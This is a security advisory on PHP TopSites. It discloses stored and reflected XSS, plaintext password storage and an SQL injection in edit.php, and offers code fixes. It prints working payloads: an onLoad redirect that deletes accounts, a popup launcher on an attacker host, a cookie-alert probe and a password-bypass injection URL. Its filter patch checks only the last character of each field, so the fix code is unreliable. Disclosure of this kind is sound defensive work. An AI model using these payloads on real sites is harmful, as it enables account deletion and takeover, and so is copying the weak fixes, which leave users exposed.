Multiple PHP Topsites Vulnerabities found PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti- Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more. http://www.itop10.net/products/ The thousands of sites that use PHP Topsites are strongly advised to upgrade, fix or discard their phptopsites scripts. Vulnerability 1. Critical XSS Vulnerability in all versions of PHP TopSites Version: All Script: Add.php Because PHP TopSites does not have session authentication, it allows an attacker to use an XSS vulnerability to do things like delete, edit, and change user accounts by having an unknowing admin run the code. By putting the following in the description field when adding a new website to any particular topsite, it's almost impossible for any admin not to run the following code (unless they have customized browser security settings). The following code is executed when the admin loads the page. He has to do nothing but load the page in order to validate a site and the integrity of the database can be destroyed as the code is never parsed out of the field and the page does not display it, it executes it. Below are a few examples - placed into the description field when adding a new site. <body onLoad= "parent.location='http://www.somewebsite.com/TopSitesdirectory/sedi tor.php?sid=siteidnumber&a=delete'"> This code will effectively delete the user account with the site id number as soon as the admin loads the page. <body onLoad="window.open('http://attackerswebsite/launcher.htm')"> Using this code, an attacker can open a popup window to a page on his site that contains code for several more popup windows. Each window can be used to delete a site from the PHP TopSites database. This method can totally erase a TopSites database as soon as the admin loads the page. To fix this vulnerability open add.php and find: if (!$name) { $err.= "Please enter your name.<BR>"; } if (!$passw) { $err.= "Please enter password.<BR>"; } if (!$email) { $err.= "Please enter your email address.<BR>"; } if (!$title) { $err.= "Please enter site title.<BR>"; } if (!$url) { $err.= "Please enter site url.<BR>"; } if (!$banner_w) { $err.= "Please enter banner width.<BR>"; } if (!$banner_h) { $err.= "Please enter banner height.<BR>"; } if (!$description) { $err.= "Please enter site description.<BR>"; } if (!$category) { $err.= "Please enter site category.<BR>"; } if (check_email_addr($email) == 0) { $err.= "Please enter valid email address.<BR>"; } Below it paste: /////////////////////////////////////////////////////////////////////////// //////////////////////// // Critical XSS Vuln Fix By JeiAr = (jeiar@kmfms.com) January 12 2003 - All Versions PHP Topsites // /////////////////////////////////////////////////////////////////////////// //////////////////////// if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $name)) {$err.= "Please enter A valid Name.<BR>";} if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $passw)) {$err.= "Please enter A valid Password<BR>";} if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $title)) {$err.= "Please enter A valid Title<BR>";} if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $linkback)) {$err.= "Please enter A valid Linkback<BR>";} if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $url)) {$err.= "Please enter A valid URL<BR>";} if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_url)) {$err.= "Please enter A valid Banner URL<BR>";} if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_w)) {$err.= "Please enter A valid Banner Width<BR>";} if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_h)) {$err.= "Please enter A valid Banner Height<BR>";} if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $description)) {$err.= "Please enter A valid Description<BR>";} if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $category)) {$err.= "Please enter A valid Category<BR>";} /////////////////////////////////////////////////////////////////////////// ///////////////////////// Vulnerability 2. XSS Vulnerability in all versions of PHP TopSites Version: All Script: help.php Because PHP TopSites does not have session authentication, it allows an attacker to use an XSS vulnerability steal cookies or other user-supplied information. The page being generated with unvalidated input from untrustworthy sources causes this vulnerability. The developer is urged to implement session authentication into this script. The following example lies in the help.php file. http://somewebsitesite/TopSitesdirectory/help.php?sid=<script>alert (document.cookie)</script> Vulnerability 3. Plaintext Password Disclosure Vulnerability in all versions of PHP TopSites Version: All Script: seditor.php No current versions of PHP TopSites encrypt user passwords, and these plaintext passwords can be viewed by anyone with access to the admin panel or edit.php page. Any Topsite Admin (or intruder) can possibly use the user supplied password to try and compromise the security of the user supplied website and or the user supplied email account. So anyone signing up for a TopList using PHP TopSites should keep this in mind, and it should also be noted to anyone using the same password for everything, that this is generally not a very good habit to have. This vulnerability affects all versions. A suggestion to the developer would be to crypt the passes via md5, and not allow the password to be displayed to an admin when editing a TopList user(s). Vulnerability 4. PHP TopSites User Account Compromise Vulnerability in All Pro versions and in 1.xx Free versions Version: All Pro Versions and Free Versions 1.xx Script:edit.php This is exploitable because of two conditions in the PHP/MYSQL configuration. Firstly, register_globals parameter is on in php.ini, which automatically turns every variable into a global variable. Secondly, the underlying database is MYSQL, which does not require numeric criteria in the SQL statement to be quoted. This allows an attacker to bypass the magic_quoted_gpcs protection in PHP manipulating numeric parts of a query. It is possible for an attacker to use SQL injection to expose all user account details for any user he or she knows the id number of. All site ID numbers of a particular Top List are made available on the index.php page. The vulnerable code resides in edit.php. Examples are listed below. http://examplewebsite.com/topsitesdirectory/edit.php? a=pre&submit=&sid=siteidnumber-- This injection negates the use of a password and provides access to the TopList edit page. All information about a particular site can be viewed and edited from this page. One thing to note, the password is displayed as plaintext on this page also. All users of the 1.XX Free script(s) are urged to upgrade their scripts as soon as possible. If you are not able to upgrade, the below code should serve as a quick fix. In the Edit.php file change: $query = mysql_db_query ($dbname,"Select * from top_user Where sid=$sid AND password='$passw'",$db) or die (mysql_error()); to: $query = mysql_db_query ($dbname,"Select * from top_user Where sid='$sid'AND password='$passw'",$db) or die (mysql_error()); In conclusion, the vulnerabilities in this script make it very easy for an attacker to exploit. The vulnerabilities present in this script compromise the security of user accounts, the integrity of the data in the database, and the security of the server it is hosted on. All administrators that are currently using this script in their websites are strongly urged to patch or upgrade the PHP TopSites script. Some versions, such as the Pro version, have no developer upgrades or patches available at the time of this writing, so they are still vulnerable to the attacks mentioned above. All Credits go to the CyberArmy Application and Code Auditing Team and CyberArmy Security Research
